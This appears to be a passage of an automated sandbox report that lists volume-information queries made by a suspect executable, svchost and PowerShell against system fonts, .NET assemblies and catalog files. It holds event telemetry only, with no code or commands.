                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
